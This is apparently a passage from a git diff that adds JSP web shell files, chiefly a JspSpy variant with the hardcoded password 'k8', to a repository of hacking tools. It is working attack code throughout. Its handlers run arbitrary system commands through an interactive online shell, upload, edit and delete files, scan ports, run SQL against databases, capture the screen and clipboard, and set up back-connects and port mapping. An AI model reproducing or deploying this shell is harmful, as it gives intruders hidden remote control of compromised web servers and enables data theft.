    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/hackk8/JSP/other/jspspy_k8.jsp b/jsp/hackk8/JSP/other/jspspy_k8.jsp new file mode 100644 index 0000000..4cd20f1 --- /dev/null +++ b/jsp/hackk8/JSP/other/jspspy_k8.jsp @@ -0,0 +1,2323 @@ +<%@page pageEncoding="UTF-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +private static final String PW = "k8"; +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(" "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout (秒) : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
